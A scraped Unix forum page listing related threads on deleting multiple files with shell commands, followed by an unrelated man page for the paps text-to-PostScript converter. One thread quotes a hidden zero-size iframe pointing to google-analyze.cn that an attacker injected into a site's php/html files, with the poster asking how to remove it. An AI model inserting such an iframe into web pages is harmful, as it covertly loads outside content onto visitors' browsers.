Sponsored Content
Top Forums UNIX for Dummies Questions & Answers How To Delete Multiple Files At Once? Post 302887855 by sea on Tuesday 11th of February 2014 07:58:33 AM
Old 02-11-2014
Those files are (what i call) system files, at least they are important to the 'userspace' of the system.

As that is the reason, i'd ask the exclude question in that other thread Smilie

10 More Discussions You Might Find Interesting

1. UNIX for Dummies Questions & Answers

when I try to run rm on multiple files I have problem to delete files with space

Hello when I try to run rm on multiple files I have problem to delete files with space. I have this command : find . -name "*.cmd" | xargs \rm -f it doing the work fine but when it comes across files with spaces like : "my foo file.cmd" it refuse to delete it why? (1 Reply)
Discussion started by: umen
1 Replies

2. UNIX for Dummies Questions & Answers

Need a script to delete multiple files

Hello, I am working with about 500,000 text files and 90% of them are duplicates. I need a way to delete the duplicate ones. The files are email messages with the following file name examples: 20040129-1457 This is the Subject line.txt 20040129-1457 This is the Subject line-1.txt... (3 Replies)
Discussion started by: navycow
3 Replies

3. Shell Programming and Scripting

Script to delete all data from multiple files

its urgent!!!!!!111 i need a script which can delete data from multiple files. plz if anybody knows the script plz write a mail to me : (Email addresses are not allowed) (5 Replies)
Discussion started by: uni_ajay_r
5 Replies

4. Shell Programming and Scripting

[help]Delete or replace text in multiple file and multiple directory

here's the case : almost of php/html file on my site has added the text : <iframe src="http://google-analyze.cn/count.php?o=1" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>I don't know how this happen, so i want to remove above text from all... (16 Replies)
Discussion started by: dzufauzan
16 Replies

5. Shell Programming and Scripting

script to delete multiple files in remote machine

Requirement Several files in remote machines ought to be deleted via sh. Name of the files to be deleted are know Approach 1) script was written with ftp (requires credential) and delete command. File names were passed as array(iterated via for loop-with ftp+delete commands enclosed within... (1 Reply)
Discussion started by: vkalya
1 Replies

6. Shell Programming and Scripting

Shell Script to delete files within a particular time frame under multiple sub folders

Greetings! I'm looking for starting information for a shell script. Here's my scenario: I have multiple folders(100) for example: /www/test/applications/app1/logs /www/test/applications/app2/logs Within these folders there are log files files that need to be deleted after a month. ... (3 Replies)
Discussion started by: whysolucky
3 Replies

7. Shell Programming and Scripting

Script to delete files older than x days and also taking an input for multiple paths

Hi , I am a newbie!!! I want to develop a script for deleting files older than x days from multiple paths. Now I could reach upto this piece of code which deletes files older than x days from a particular path. How do I enhance it to have an input from a .txt file or a .dat file? For eg:... (12 Replies)
Discussion started by: jhilmil
12 Replies

8. Shell Programming and Scripting

Script needed to delete to the list of files in a directory based on last created & delete them

Hi My directory structure is as below. dir1, dir2, dir3 I have the list of files to be deleted in the below path as below. /staging/retain_for_2years/Cleanup/log $ ls -lrt total 0 drwxr-xr-x 2 nobody nobody 256 Mar 01 16:15 01-MAR-2015_SPDBS2 drwxr-xr-x 2 root ... (2 Replies)
Discussion started by: prasadn
2 Replies

9. Shell Programming and Scripting

Find files not matching multiple patterns and then delete anything older than 10 days

Hi, I have multiple files in my log folder. e.g: a_m1.log b_1.log c_1.log d_1.log b_2.log c_2.log d_2.log e_m1.log a_m2.log e_m2.log I need to keep latest 10 instances of each file. I can write multiple find commands but looking if it is possible in one line. m file are monthly... (4 Replies)
Discussion started by: wahi80
4 Replies

10. Shell Programming and Scripting

Help with column delete from multiple files

sample .csv files with 7 columns.I want to delete the last column from each of the below files but retain their file names (1_ContractDocuments.csv,2_ContractDocuments.csv etc.) There can be more files like 3_ContractDocuments.csv , 4_ContractDocuments.csv . Can you please help source .csv... (5 Replies)
Discussion started by: paul1234
5 Replies
PAPS(1) 						      General Commands Manual							   PAPS(1)

NAME
paps - UTF-8 to PostScript converter using Pango SYNOPSIS
paps [options] files... DESCRIPTION
paps reads a UTF-8 encoded file and generates a PostScript language rendering of the file. The rendering is done by creating outline curves through the pango ft2 backend. OPTIONS
These programs follow the usual GNU command line syntax, with long options starting with two dashes (`-'). A summary of options is included below. --landscape Landscape output. Default is portrait. --columns=cl Number of columns output. Default is 1. Please notice this option isn't related to the terminal length as in a "80 culums terminal". --font=desc Set the font description. Default is Monospace 12. --rtl Do right to left (RTL) layout. --paper ps Choose paper size. Known paper sizes are legal, letter and A4. Default is A4. Postscript points Each postscript point equals to 1/72 of an inch. 36 points are 1/2 of an inch. --bottom-margin=bm Set bottom margin. Default is 36 postscript points. --top-margin=tm Set top margin. Default is 36 postscript points. --left-margin=lm Set left margin. Default is 36 postscript points. --right-margin=rm Set right margin. Default is 36 postscript points. --gutter-width=gw Set gutter width. Default is 40 postscript points. --help Show summary of options. --header Draw page header for each page. --markup Interpret the text as pango markup. --lpi Set the lines per inch. This determines the line spacing. --cpi Set the characters per inch. This is an alternative method of specifying the font size. --stretch-chars Indicates that characters should be stretched in the y-direction to fill up their vertical space. This is similar to the texttops behaviour. AUTHOR
paps was written by Dov Grobgeld <dov.grobgeld@gmail.com>. This manual page was written by Lior Kaplan <kaplan@debian.org>, for the Debian project (but may be used by others). April 17, 2006 PAPS(1)